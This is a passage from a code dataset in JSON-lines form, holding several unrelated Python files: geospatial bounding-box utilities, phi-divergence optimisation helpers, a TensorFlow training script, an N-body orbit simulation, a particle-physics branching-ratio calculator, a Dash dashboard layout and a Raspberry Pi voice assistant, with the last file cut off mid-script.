The output bounding box will also cross\n the antimeridian.\n\n \"\"\"\n antimeridian_bboxes = [\n get_antimeridian_geometry_bbox(grouped_lons, grouped_lats)\n for grouped_lons, grouped_lats in grouped_coordinates\n if len(grouped_lons) > 1\n and crosses_antimeridian(grouped_lons)\n ]\n\n if len(antimeridian_bboxes) > 0:\n aggregated_extents = list(zip(*antimeridian_bboxes))\n antimeridian_bbox = BBox(min(aggregated_extents[0]),\n min(aggregated_extents[1]),\n max(aggregated_extents[2]),\n max(aggregated_extents[3]))\n else:\n antimeridian_bbox = None\n\n return antimeridian_bbox\n\n\ndef get_antimeridian_geometry_bbox(grouped_lons: Tuple[float],\n grouped_lats: Tuple[float]) -> BBox:\n \"\"\" Combine the longitudes and latitudes for a single GeoJSON geometry into\n a bounding box that encapsulates that geometry. The input to this\n function will already have been identified as crossing the\n antimeridian. The longitudes will be split into two groups either side\n of the antimeridian, so the westernmost point west of the antimeridian\n and the easternmost point east of the antimeridian can be found.\n\n This function assumes that, on average, those points east of the\n antimeridian will have a lower average longitude than those west of it.\n\n The output from this function will be a bounding box that also crosses\n the antimeridian.\n\n \"\"\"\n longitudes_group_one = [grouped_lons[0]]\n longitudes_group_two = []\n current_group = longitudes_group_one\n\n for previous_index, longitude in enumerate(grouped_lons[1:]):\n if crosses_antimeridian([longitude, grouped_lons[previous_index]]):\n if current_group == longitudes_group_one:\n current_group = longitudes_group_two\n else:\n current_group = longitudes_group_one\n\n current_group.append(longitude)\n\n if np.mean(longitudes_group_one) < np.mean(longitudes_group_two):\n east_lons = longitudes_group_one\n west_lons = longitudes_group_two\n else:\n east_lons = longitudes_group_two\n west_lons = longitudes_group_one\n\n return BBox(min(west_lons), min(grouped_lats), max(east_lons),\n max(grouped_lats))\n\n\ndef get_latitude_range(contiguous_bbox: Optional[BBox],\n antimeridian_bbox: Optional[BBox]) -> Tuple[float]:\n \"\"\" Retrieve the southern and northern extent for all bounding boxes. One\n of `contiguous_bbox` or `antimeridian_bbox` must not be `None`.\n\n * `contiguous_bbox`: A bounding box that minimally encompasses all\n GeoJSON geometries that do not cross the antimeridian.\n * `antimeridian_bbox`: A bounding box that minimally encompasses all\n GeoJSON geometries that _do_ cross the antimeridian.\n\n \"\"\"\n south_values = [bbox.south for bbox in [contiguous_bbox, antimeridian_bbox]\n if bbox is not None]\n north_values = [bbox.north for bbox in [contiguous_bbox, antimeridian_bbox]\n if bbox is not None]\n\n return min(south_values), max(north_values)\n\n\ndef bbox_in_longitude_range(bounding_box: BBox, west_limit: float,\n east_limit: float) -> bool:\n \"\"\" Check if the specified bounding box is entirely contained by the\n specified longitude range.\n\n This function is used to identify when geometries that do not cross the\n antimeridian are contained by the longitudinal range of those that do.\n\n \"\"\"\n return (west_limit <= bounding_box[0] <= east_limit\n and west_limit <= bounding_box[2] <= east_limit)\n\n\ndef aggregate_all_geometries(geojson_input: GeoJSON) -> List[AggCoordinates]:\n \"\"\" Parse the input GeoJSON object, and identify all items within it\n containing geometries. 
When items containing geometries are identified,\n functions are called to aggregate the coordinates within each geometry\n and return a list of aggregated longitudes and latitudes for each\n geometry (or sub-geometry member, e.g., multiple points, linestrings or\n polygons).\n\n \"\"\"\n if 'coordinates' in geojson_input:\n # A Geometry object with a `coordinates` attribute, e.g., Point,\n # LineString, Polygon, etc.\n grouped_coords = aggregate_geometry_coordinates(\n geojson_input['coordinates']\n )\n elif 'geometries' in geojson_input:\n # A GeometryCollection geometry.\n grouped_coords = flatten_list([\n aggregate_geometry_coordinates(geometry['coordinates'])\n for geometry in geojson_input['geometries']\n ])\n elif ('geometry' in geojson_input\n and 'coordinates' in geojson_input['geometry']):\n # A GeoJSON Feature (e.g., Point, LineString, Polygon, etc)\n grouped_coords = aggregate_geometry_coordinates(\n geojson_input['geometry']['coordinates']\n )\n elif ('geometry' in geojson_input\n and 'geometries' in geojson_input['geometry']):\n # A GeoJSON Feature containing a GeometryCollection\n grouped_coords = flatten_list([\n aggregate_all_geometries(geometry)\n for geometry in geojson_input['geometry']['geometries']\n ])\n elif 'features' in geojson_input:\n # A GeoJSON FeatureCollection\n grouped_coords = flatten_list(aggregate_all_geometries(feature)\n for feature in geojson_input['features'])\n else:\n raise InvalidInputGeoJSON()\n\n return grouped_coords\n\n\ndef aggregate_geometry_coordinates(\n coordinates: Coordinates,\n aggregated_coordinates: List[AggCoordinates] = None\n) -> List[AggCoordinates]:\n \"\"\" Extract the aggregated latitude and longitude coordinates associated\n with all child items in the `coordinates` attribute of a GeoJSON\n geometry. The order of longitudes and latitudes are preserved to allow\n later checking for antimeridian crossing.\n\n Some geometries have multiple parts, such as MultiLineStrings or\n MultiPolygons. These each have their own entries in the output list,\n so that the bounding box of each can be derived independently. Keeping\n sub-geometries separate is important to avoid spurious identification\n of antimeridian crossing.\n\n Return value:\n\n [\n [(x_0, ..., x_M), (y_0, ..., y_M)], # For GeoJSON sub-geometry one\n [(x_0, ..., x_N), (y_0, ..., y_N)] # For GeoJSON sub-geometry two\n ]\n\n For geometry types: Point, LineString and Polygon, there will be only\n a single sub-geometry item in the returned list.\n\n \"\"\"\n if aggregated_coordinates is None:\n aggregated_coordinates = []\n\n if is_single_point(coordinates):\n aggregated_coordinates.append([(coordinates[0], ), (coordinates[1], )])\n elif is_list_of_coordinates(coordinates):\n aggregated_coordinates.append(list(zip(*coordinates)))\n else:\n for nested_coordinates in coordinates:\n aggregate_geometry_coordinates(nested_coordinates,\n aggregated_coordinates)\n\n return aggregated_coordinates\n\n\ndef is_list_of_coordinates(input_object) -> bool:\n \"\"\" Checks if the input contains a list of coordinates, which Python will\n represent as a list of lists of numerical values, e.g.:\n\n ```Python\n list_of_coordinates = [[0.1, 0.2], [0.3, 0.4]]\n ```\n\n \"\"\"\n return (isinstance(input_object, list)\n and all(is_single_point(element) for element in input_object))\n\n\ndef is_single_point(input_object) -> bool:\n \"\"\" Checks if the input is a single list of numbers. 
Note, coordinates may\n or may not include a vertical coordinate as a third element.\n\n \"\"\"\n return (isinstance(input_object, list)\n and len(input_object) in (2, 3)\n and all(isinstance(element, (float, int))\n for element in input_object))\n\n\ndef flatten_list(list_of_lists: List[List]) -> List:\n \"\"\" Flatten the top level of a list of lists, to combine all elements in\n the child lists to be child elements at the top level of the object.\n For example:\n\n Input: [[1, 2, 3], [4, 5, 6]]\n Output: [1, 2, 3, 4, 5, 6]\n\n \"\"\"\n return [item for sub_list in list_of_lists for item in sub_list]\n\n\ndef crosses_antimeridian(longitudes: List[Union[float, int]],\n longitude_threshold: float = 180.0) -> bool:\n \"\"\" Check if a specified list of ordered longitudes crosses the\n antimeridian (+/- 180 degrees east). This check assumes that any points\n that are separated by more than 180 degrees east in longitude will\n cross the antimeridian. There are edge-cases where this may not be\n true, but it is a common condition used in similar checks:\n\n https://towardsdatascience.com/around-the-world-in-80-lines-crossing-the-antimeridian-with-python-and-shapely-c87c9b6e1513\n\n \"\"\"\n return np.abs(np.diff(longitudes)).max() > longitude_threshold\n\n\ndef get_bounding_box_lon_lat(bounding_box: List[float]) -> BBox:\n \"\"\" Parse a GeoJSON bounding box attribute, and retrieve only the\n horizontal coordinates (West, South, East, North).\n\n \"\"\"\n if len(bounding_box) == 4:\n horizontal_bounding_box = BBox(*bounding_box)\n elif len(bounding_box) == 6:\n horizontal_bounding_box = BBox(bounding_box[0], bounding_box[1],\n bounding_box[3], bounding_box[4])\n else:\n raise InvalidInputGeoJSON()\n\n return horizontal_bounding_box\n","repo_name":"nasa/harmony-opendap-subsetter","sub_path":"hoss/bbox_utilities.py","file_name":"bbox_utilities.py","file_ext":"py","file_size_in_byte":16745,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"63"} +{"seq_id":"3554987210","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport numpy as np\nimport pandas as pd\nimport cvxpy as cp\nimport mosek\nimport matplotlib.pyplot as plt\nimport datetime as date\nfrom datetime import datetime as dt\nfrom dateutil.relativedelta import *\nimport scipy.stats\nfrom scipy.stats import rankdata\n\n\n# In[5]:\n\n\n######## The representations of the epigraph of the perspective of the phi conjugates: gamma*(phi^*)(s/gamma) <= t are given below for several\n##### phi functions\n\n##### the modified chi-squared function phi(x)= (x-1)^2\n\ndef mod_chi2_conj(gamma,s,t,w,constraints):\n constraints.append(cp.norm(cp.vstack([w,t/2]))<=(t+2*gamma)/2)\n constraints.append(s/2+gamma<= w)\n return(constraints)\n\n#### the kullback-leibler function phi(x) = xlog(x)-x+1 \n\ndef kb_conj(gamma,s,t,w,constraints):\n constraints.append(w - gamma <= t)\n constraints.append(cp.kl_div(gamma,w)+gamma+s-w<= 0)\n return(constraints)\n\n\n# In[3]:\n\n\n####### the constraints sum^N_{i=1}p_iphi(q_i/p_i) <= r is written here (in cvxpy syntax) for several phi functions\n\ndef mod_chi2_cut(p,q,r,par,constraints):\n N = p.shape[0]\n phi_cons = 0\n for i in range(N):\n phi_cons = phi_cons + 1/p[i]*(q[i]-p[i])**2\n constraints.append(phi_cons<=r)\n return(constraints)\n\ndef kb_cut(p,q,r,par,constraints):\n N = p.shape[0]\n phi_cons = 0\n for i in range(N):\n phi_cons = phi_cons -cp.entr(q[i]) - q[i]*np.log(p[i])\n constraints.append(phi_cons<=r)\n return(constraints)\n\n\n# In[6]:\n\n\n###### 
functions that evaluate the phi functions\n\ndef kb_eva(p,q):\n    N = len(p)\n    phi = 0\n    for i in range(N):\n        if q[i]<= 0:\n            phi = phi + 0\n        else:\n            phi = phi + q[i]*np.log(q[i]/p[i])\n    return(phi)\n\ndef mod_chi2_eva(p,q):\n    N = len(p)\n    phi = 0\n    for i in range(N):\n        if p[i]== 0:\n            return (np.inf)\n        phi = phi + (p[i]-q[i])**2/p[i]\n    return(phi)\n\n","repo_name":"GuanJinNL/ROptRDU.github.io","sub_path":"phi_divergence.py","file_name":"phi_divergence.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"31166634858","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nimport sys\nimport traceback\n\nfrom model.model_lib.EstimatorWithFastEvaluate import EstimatorWithFastEvaluate\nfrom utils.utils import *\nfrom utils.config import TaskConfig\nfrom model.model_lib.estimator import Estimator\nimport tensorflow as tf\n\nflags = tf.app.flags\nflags.DEFINE_string(\"ps_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"worker_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"chief_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"evaluator_hosts\", \"\", \"Comma-separated list of hostname:port pairs\")\nflags.DEFINE_string(\"job_name\", \"chief\", \"One of 'ps', 'worker', 'chief', 'evaluator'\")\nflags.DEFINE_integer(\"task_index\", 0, \"Index of task within the job\")\n\nflags.DEFINE_string(\"task\", 'train', \"task: train_eval, train, evaluate or infer\")\nflags.DEFINE_string(\"model_dir\", \"s\", \"model_dir\")\n\nflags.DEFINE_string(\"config_file\", \"task_conf.json\", \"config name\")\nflags.DEFINE_string(\"data_struct_file\", \"data_struct.json\", \"data struct file name\")\nFLAGS = flags.FLAGS\n\n\ndef main(_):\n    logger = set_logger()\n\n    task_config = TaskConfig(FLAGS.config_file, FLAGS.data_struct_file)\n    init_environment(FLAGS, task_config.params, logger)\n\n    model_class = import_class(task_config.params['model_class_name'])\n    model = model_class(task_config.data_struct,\n                        task_config.params,\n                        logger,\n                        **task_config.params)\n    if int(task_config.params['is_dist']) == 0 and int(task_config.params['local_debug']) == 1:\n        run_config = init_single_run_config(FLAGS, task_config.params, logger)\n    else:\n        run_config = init_run_config(FLAGS, task_config.params, logger)\n    estimator = EstimatorWithFastEvaluate(model, task_config.data_struct, run_config,\n                                          logger, FLAGS, task_config.params)\n\n    try:\n        if FLAGS.task == 'train':\n            estimator.train()\n        elif FLAGS.task == 'evaluate':\n            estimator.evaluate()\n        elif FLAGS.task == 'infer':\n            estimator.infer()\n        else:\n            raise ValueError('Run task does not exist!')\n    except Exception as e:\n        exc_info = traceback.format_exc()\n        msg = 'creating session exception:%s\\n%s' % (e, exc_info)\n        tmp = 'Run called even after should_stop requested.'\n        should_stop = type(e) == RuntimeError and str(e) == tmp\n        if should_stop:\n            logger.warn(msg)\n        else:\n            logger.error(msg)\n        # exit code 0 means 'finished', 1 means 'will retry'\n        exit_code = 0 if should_stop else 1\n        sys.exit(exit_code)\n\n\nif __name__ == \"__main__\":\n    tf.app.run()\n","repo_name":"W-void/DSAIN","sub_path":"train_eval.py","file_name":"train_eval.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"43696340124","text":"from scipy.integrate import odeint # for integrate.odeint\nfrom pylab import * # for plotting 
commands\n#1 is earth 2 is jup\nGM = (4*pi**2)\n#same order for x input into planets\nx1 = 2.52\ny1 = 0\nvx1 = 0\nvy1 = sqrt(GM/2.52)\nx2 = 5.24\ny2 = 0\nvx2 = 0\nvy2 = sqrt(GM/5.24)\n#\n#for python ODE\ndef planets(x,t):\n dxdt = zeros(size(x))\n r1 = sqrt(x[0]**2 + x[1]**2)\n r2 = sqrt(x[4]**2 + x[5]**2)\n r21 = sqrt((x[4] - x[0])**2 + (x[5] - x[1])**2)\n dxdt[0] = x[2]\n dxdt[1] = x[3]\n dxdt[2] = -(GM/r1**3)*x[0] + (0.04*GM/r21**3)*(x[4] - x[0])\n dxdt[3] = -(GM/r1**3)*x[1] + (0.04*GM/r21**3)*(x[5] - x[1])\n dxdt[4] = x[6]\n dxdt[5] = x[7]\n dxdt[6] = -(GM/r2**3)*x[4] - (0.001*GM/r21**3)*(x[4] - x[0])\n dxdt[7] = -(GM/r2**3)*x[5] - (0.001*GM/r21**3)*(x[5] - x[1])\n return dxdt\n#for my rungkutta because x and t are switched\ndef planet(t,x):\n dxdt = zeros(size(x))\n r1 = sqrt(x[0]**2 + x[1]**2)\n r2 = sqrt(x[4]**2 + x[5]**2)\n r21 = sqrt((x[4] - x[0])**2 + (x[5] - x[1])**2)\n dxdt[0] = x[2]\n dxdt[1] = x[3]\n dxdt[2] = -(GM/r1**3)*x[0] + (0.04*GM/r21**3)*(x[4] - x[0])\n dxdt[3] = -(GM/r1**3)*x[1] + (0.04*GM/r21**3)*(x[5] - x[1])\n dxdt[4] = x[6]\n dxdt[5] = x[7]\n dxdt[6] = -(GM/r2**3)*x[4] - (0.001*GM/r21**3)*(x[4] - x[0])\n dxdt[7] = -(GM/r2**3)*x[5] - (0.001*GM/r21**3)*(x[5] - x[1])\n return dxdt\n \n#ODE int\ndef RungKutta(x,f,t,dt):\n RK1 = f(t,x) * dt\n RK2 = f(t + dt/2, x + RK1/2) * dt\n RK3 = f(t + dt/2, x + RK2/2) * dt\n RK4 = f(t+ dt, x + RK3) * dt \n return x + (1.0/6.0)*(RK1 + 2*RK2 + 2*RK3 + RK4)\n \n#initial conditions\nstate = array([x1,y1,vx1,vy1,x2,y2,vx2,vy2])\ntimes = linspace(0,100,1000)\n \n#Rungkutta solution\nrk_sol = [state]\ndt = 0.1\nrk_time = [0]\nwhile rk_time[-1] < 100:\n rk_sol.append(RungKutta(rk_sol[-1],planet,rk_time[-1],dt))\n rk_time.append(rk_time[-1] + dt)\n \n#python ODE solver solution\nstates = odeint(planets,state,times)\n \nE_x = states[:,0]\nE_y = states[:,1]\nJ_x = states[:,4]\nJ_y = states[:,5]\n \n#energy conservation\ndef Energy(x,t):\n r1 = sqrt(x[0]**2 + x[1]**2)\n r2 = sqrt(x[4]**2 + x[5]**2)\n r21 = sqrt((x[4] - x[0])**2 + (x[5] - x[1])**2)\n v1sq = (x[2]**2 + x[3]**2)\n v2sq = (x[6]**2 + x[7]**2)\n return (0.5*0.001*v1sq) + (0.5*0.04*v2sq) - (0.001*GM/r1) - (0.04*GM/r2) - ((0.001*0.04*GM)/r21)\n#angular momentum\ndef Momentum(x,t):\n return 0.001*(x[0]*x[3] - x[1]*x[2]) + 0.04*(x[4]*x[7] - x[5]*x[6])\n \nEoverM = []\nfor i in range(len(times)):\n EoverM.append(Energy(states[i],times[i]))\n \nLoverM = []\nfor i in range(len(times)):\n LoverM.append(Momentum(states[i],times[i]))\n \n#plotting \nfig = plt.figure()\nax1 = fig.add_subplot(311)\nax1.plot(E_x,E_y,'or')\nax1.plot(J_x,J_y,'ob')\nplt.xlabel('Distances (A.U.)')\nplt.ylabel('Distances (A.U.)')\nlegend([\"Earth\", \"Jupiter\"])\nax2 = fig.add_subplot(312)\nax2.plot(times,EoverM,'ob')\nplt.xlabel('Time (yrs)')\nplt.ylabel('Energy/M')\nax3 = fig.add_subplot(313)\nax3.plot(times,LoverM,'ob')\nplt.xlabel('Time (yrs)')\nplt.ylabel('Angular Momentum/M')\nplt.show()","repo_name":"huginn-sim/nbody","sub_path":"planets.py","file_name":"planets.py","file_ext":"py","file_size_in_byte":3036,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"} +{"seq_id":"43696340124","text":"import numpy\nfrom uncertainties import ufloat\n\n\nclass Unit(object):\n GeV = 1\n MeV = 1e-3 * GeV\n eV = 1e-9 * GeV\n s = 1. / 6.582119e-16 / eV\n\n\nclass BToMuNuCalculations(object):\n\n def __init__(self):\n \"\"\" Calculates the Standard Model prediction for the B -> l nu decay.\n\n K.A. Olive et al. (Particle Data Group), Chin. Phys. 
C, 38, 090001 (2014).\n        - Fermi coupling constant\n        - B-Meson mass\n        - B-Meson lifetime\n        - V_ub\n        - Electron mass\n        - Muon mass\n        - Tau mass\n\n        arXiv:1212.0586v1 [hep-lat].\n        - Decay constant\n\n        :return:\n        \"\"\"\n        self.fermi_coupling_constant = ufloat(1.1663786e-5 * Unit.GeV**-2, 0 * Unit.GeV**-2, tag=\"G_F\")\n        self.b_meson_mass = ufloat(5279.26 * Unit.MeV, 0.17 * Unit.MeV, tag=\"M_B\")\n        self.b_meson_lifetime = ufloat(1.638e-12 * Unit.s, 0.004e-12 * Unit.s, tag=\"tau_B\")\n        self.decay_constant = ufloat(0.191 * Unit.GeV, 0.009 * Unit.GeV, tag=\"f_B\")\n        # self.v_ub = ufloat(4.13e-3, 0.49e-3, tag=\"V_ub\")  # PDG\n        self.v_ub = ufloat(3.95e-3, numpy.sqrt(0.39e-3**2 + 0.38e-3**2), tag=\"V_ub\")\n        self.electron_mass = ufloat(0.510998929 * Unit.MeV, 0.000000022 * Unit.MeV, tag=\"m_e\")\n        self.muon_mass = ufloat(105.6583715 * Unit.MeV, 0.0000035 * Unit.MeV, tag=\"m_mu\")\n        self.tau_mass = ufloat(1776.82 * Unit.MeV, 0.16 * Unit.MeV, tag=\"m_tau\")\n\n    def standard_model_branching_ratio(self, lepton_mass):\n        \"\"\" Standard Model prediction for the given lepton mass.\n        Equation taken from Physics at the B-factories p.396.\n\n        :param lepton_mass:\n        :return: branching ratio\n        \"\"\"\n        return self.fermi_coupling_constant**2 * self.b_meson_mass * lepton_mass**2 / (8 * numpy.pi) \\\n            * (1 - (lepton_mass / self.b_meson_mass)**2)**2 \\\n            * self.decay_constant**2 * self.v_ub**2 * self.b_meson_lifetime\n\n    def two_higgs_doublet_model_branching_ratio(self, lepton_mass, tan_beta, m_charged_higgs):\n        r_h = (1 - self.b_meson_mass**2 * tan_beta**2 / m_charged_higgs**2)**2\n        return self.standard_model_branching_ratio(lepton_mass) * r_h\n\nif __name__ == '__main__':\n    calculator = BToMuNuCalculations()\n    e = calculator.standard_model_branching_ratio(calculator.electron_mass)\n    mu = calculator.standard_model_branching_ratio(calculator.muon_mass)\n    tau = calculator.standard_model_branching_ratio(calculator.tau_mass)\n\n    print(\"Standard Model branching ratio predictions:\")\n    print(\"BR(B->e nu):\\t{:.2e}\".format(e))\n    print(\"BR(B->mu nu):\\t{:.2e}\".format(mu))\n    print(\"BR(B->tau nu):\\t{:.2e}\".format(tau))\n    print()\n    print(\"Electron and Muon helicity suppression compared to Tau Channel:\")\n    print(\"BR(B->e nu) / BR(B->tau nu):\\t{:.2e}\".format(e/tau))\n    print(\"BR(B->mu nu) / BR(B->tau nu):\\t{:.2e}\".format(mu/tau))\n    print()\n    N_BB = 772e6\n    upsilon_to_b_charged_br = 0.514\n    print(\"Signal yield N_sig^e = {}\".format(upsilon_to_b_charged_br * N_BB * e))\n    print(\"Signal yield N_sig^mu = {}\".format(upsilon_to_b_charged_br * N_BB * mu))\n    print(\"Signal yield N_sig^tau = {}\".format(upsilon_to_b_charged_br * N_BB * tau))\n","repo_name":"MarkusPrim/B_To_MuNu","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3179,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"72779517959","text":"num = float(input())\r\nif num<0.0001 or num>0.9999:\r\n\tprint (\"invalid number\")\r\n\texit ()\r\ndenominador=10000\r\nnumerador=int(round(num*10000)) # round the number to work around floating-point representation issues\r\nfor i in [4, 3, 2, 1, 0]:\r\n\tif numerador%2**i==0 and denominador%2**i==0:\r\n\t\tnumerador=numerador/2**i\r\n\t\tdenominador=denominador/2**i\r\n\t\r\nfor j in [4, 3, 2, 1, 0]:\r\n\r\n\tif numerador%5**j==0 and denominador%5**j==0:\r\n\t\tnumerador=numerador/5**j\r\n\t\tdenominador=denominador/5**j\r\n\r\n
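# Added note (worked example): 0.375 -> 3750/10000; the loop over powers of two divides\r\n# by 2**1 to give 1875/5000, and the loop over powers of five divides by 5**4 = 625 to\r\n# give 3/8, which the final print below outputs.\r\n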
print (\"%d/%d\" %(numerador, denominador))\n","repo_name":"Txus77/Prueba","sub_path":"prueba2/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"28473635507","text":"from collections import namedtuple\n\nimport dash_bootstrap_components as dbc\nfrom dash import dcc, html\n\n\ndef get_layout():\n    return dbc.Container(\n        [\n            get_selector(),\n            get_header(\"NGINX Dashboard\"),\n            html.Hr(),\n            *get_cards(),\n            html.Br(),\n            get_graphs(),\n        ]\n    )\n\n\ndef get_selector():\n    label = dbc.Label(\"\")\n    dropdown = dcc.Dropdown(\n        id=\"date-range\",\n        options=[\n            {\"label\": f\"Last {days} days\", \"value\": days} for days in [7, 30, 120]\n        ],\n        value=7,\n        style={\"marginTop\": 12},\n    )\n\n    return dbc.Row(\n        [dbc.Col(label, md=1), dbc.Col(dropdown, md=3)], justify=\"end\", align=\"center\"\n    )\n\n\ndef get_header(title):\n    title = html.H1(title, style={\"marginTop\": 12})\n    logo = html.Img(\n        src=\"https://upload.wikimedia.org/wikipedia/commons/c/c5/Nginx_logo.svg\",\n        style={\"float\": \"right\", \"height\": 30, \"marginTop\": 12},\n    )\n    return dbc.Row([dbc.Col(title, md=9), dbc.Col(logo, md=3)], align=\"center\")\n\n\ndef get_cards():\n    CardConfig = namedtuple(\"CardConfig\", [\"id\", \"desc\", \"kwargs\"])\n\n    card_configs = [\n        CardConfig(\"total-requests\", \"Total Requests\", {\"color\": \"primary\"}),\n        CardConfig(\"valid-requests\", \"Valid Requests\", {\"color\": \"success\"}),\n        CardConfig(\"failed-requests\", \"Failed Requests\", {\"color\": \"warning\"}),\n        CardConfig(\"unique-visitors\", \"Unique Visitors\", {\"color\": \"light\"}),\n        CardConfig(\"referrers\", \"Referrers\", {\"color\": \"light\"}),\n        CardConfig(\"not-found\", \"Not Found\", {\"color\": \"light\"}),\n    ]\n\n    cards = []\n    for card_config in card_configs:\n        card = dbc.Card(\n            [\n                html.H4(\"\", className=\"card-title\", id=card_config.id),\n                html.P(card_config.desc, className=\"card-text\"),\n            ],\n            body=True,\n            **card_config.kwargs,\n        )\n\n        cards.append(card)\n\n    return [\n        dbc.Row([dbc.Col(card, md=4) for card in cards[:3]]),\n        html.Br(),\n        dbc.Row([dbc.Col(card, md=4) for card in cards[3:]]),\n    ]\n\n\ndef get_graphs():\n    graph_1 = dcc.Graph(\"graph-1\")\n    graph_2 = dcc.Graph(\"graph-2\")\n\n    return dbc.Row(\n        [\n            dbc.Col(graph_1, xs=12, lg=6),\n            dbc.Col(graph_2, xs=12, lg=6),\n        ]\n    )\n","repo_name":"chrisdeutsch/nginx-dashboard","sub_path":"nginx_dashboard/layout.py","file_name":"layout.py","file_ext":"py","file_size_in_byte":2345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"24500949437","text":"#!/usr/bin/python3.7\n# coding=utf-8\n\"\"\"Import the thread-handling module\"\"\"\nimport threading\n\"\"\"Provides the delay operation\"\"\"\nimport time\n\"\"\"Only used to run terminal commands and change the module path\"\"\"\nimport sys\n\"\"\"Home-made modules need their path added manually!\"\"\"\nsys.path.append(sys.path[0])\n\"\"\"Speech recognition module\"\"\"\nfrom speak_Main import speaker\n\nimport snowboydecoder\nimport signal\nimport findWeather\n\n\nclass mainsnow():\n    \n    def __init__(self):\n        self.interrupted = False\n        self.mainCheck()\n    \n    def interrupt_callback(self):\n        #global interrupted\n        return self.interrupted\n\n    def mainCheck(self):\n        print(\"begin to check:\")\n        model = \"小花.pmdl\" #sys.argv[1]\n        # capture SIGINT signal, e.g., Ctrl+C\n        #signal.signal(signal.SIGINT, signal_handler)\n        signal.signal(signal.SIGINT, signal.SIG_DFL)  # keep the default Ctrl+C behaviour\n\n        detector = snowboydecoder.HotwordDetector(model, sensitivity=0.45)\n        
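# Added note (assumption): a higher sensitivity makes the hotword easier to\n        # trigger at the cost of more false accepts; detector.start() below blocks\n        # until interrupt_check returns True.\n        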
print('Listening... Press Ctrl+C to exit')\n        # main loop\n        detector.start( detected_callback = snowboydecoder.play_audio_file,\n                        interrupt_check = self.interrupt_callback,\n                        sleep_time=0.03)\n        detector.terminate()\n\n\n\"\"\"Function: the program waits here until the voice wake-word is recognized, making it easy for external functions to call directly\"\"\"\ndef Wait_for_question():\n    a = mainsnow()\n    \n    \ndef robot_question(Object):\n    Wait_for_question()\n    Object.paly_cloud_vice(\"嗯,怎么了\")\n    value_input = Object.Sound_recording_2(sound_time = 3)\n    \"\"\"Since there may be no recognition result, an error can occur, so handle it here\"\"\"\n    try: \n        if \"关灯\" in value_input:\n            Object.paly_cloud_vice(\"好\")\n            return 1 \n        elif \"开灯\" in value_input:\n            Object.paly_cloud_vice(\"好的\")\n            return 2\n        elif \"天气\" in value_input:\n            a = findWeather.return_weather()\n            print(a)\n            Object.paly_cloud_vice(\"今天的天气\")\n            Object.paly_cloud_vice(a[\"现在天气\"][0])#a[\"现在天气\"][1]\n            Object.paly_cloud_vice(a[\"现在天气\"][1])\n            return 0\n        elif \"数据\" in value_input:\n            Object.paly_cloud_vice(\"没问题\")\n            return 3\n        elif \"聊天\" in value_input or \"聊聊天\" in value_input:\n            return 4\n        else:\n            Object.paly_cloud_vice(\"你说啥\")\n    except:\n        return 0\n\nif __name__ == '__main__':\n    while True:\n        Speak = speaker()\n        robot_question(Speak)","repo_name":"tianxiaohuahua/Home-management-platform-and-home-robot","sub_path":"1-raspi-robot/2-raspi-python-file/1-Tianxiaohua_Robot_main/snowbodyMain.py","file_name":"snowbodyMain.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"63"}
{"seq_id":"69832170442","text":"import random\r\nfrom time import time \r\n\r\ndef randomList(n):\r\n    a = list(random.sample(range(1,1000000), n))\r\n    b = list(random.sample(range(1000001, 2000000), n))\r\n    c = list(random.sample(range(2000001, 3000000), n))\r\n    return a,b,c\r\n\r\ndef isIntersect_1(a, b, c):\r\n    for number in a:\r\n        if number in b and number in c:\r\n            return True\r\n    return False\r\n\r\ndef isIntersect_2(a, b, c):\r\n    for i in range(0, len(a)): \r\n        for j in range(0, len(b)):\r\n            for k in range(0, len(c)):\r\n                if c[k] == b[j] == a[i]:\r\n                    return True\r\n    return False\r\n\r\ndef analyze_algo(n):\r\n    a,b,c = randomList(n)\r\n    start_time = time()\r\n    isIntersect_2(a, b, c)\r\n    end_time = time() \r\n    elapsed = end_time - start_time \r\n    print(\"execution time:\", elapsed)\r\n\r\ndef main():\r\n    analyze_algo(100) #100 1000 10000 100000\r\n\r\nmain()\r\n# def analyze_algo(n):\r\n#     #stime = time()\r\n#     a,b,c = randomList(n)\r\n    #etime = time()\r\n    #elapsed = etime - stime\r\n    #print(\"create list time: \", elapsed)\r\n\r\n    # print(n)\r\n\r\n#     stime = time()\r\n#     etime = time()\r\n#     elapsed = etime - stime\r\n#     print(\"execution time isintersect1: \", elapsed)\r\n\r\n#     stime = time()\r\n#     etime = time()\r\n#     elapsed = etime - stime\r\n#     print(\"execution time isintersect2: \", elapsed)\r\n\r\n# analyze_algo(10000)\r\n","repo_name":"EIKZAZ/DSA_Y1T2","sub_path":"LAB072.py","file_name":"LAB072.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"63"}
{"seq_id":"35565387339","text":"import os\nimport glob\nimport csv\nimport copy\nimport re\n\ndef get_immediate_subdirectories(a_dir):\n    return [name for name in os.listdir(a_dir)\n            if os.path.isdir(os.path.join(a_dir, name))]\n\ndirs = get_immediate_subdirectories('/Users/carsonlam/macroeyes/population1/' )\n\nlength = len(dirs)\n\nj = 0\n\ncsvname = 'meds'\n#folderpath = '/Users/carsonlam/macroeyes/population1/'\nfolderpath = '/Volumes/Seagate Backup Plus Drive/macroeyes/population1/'\n\nfor direc 
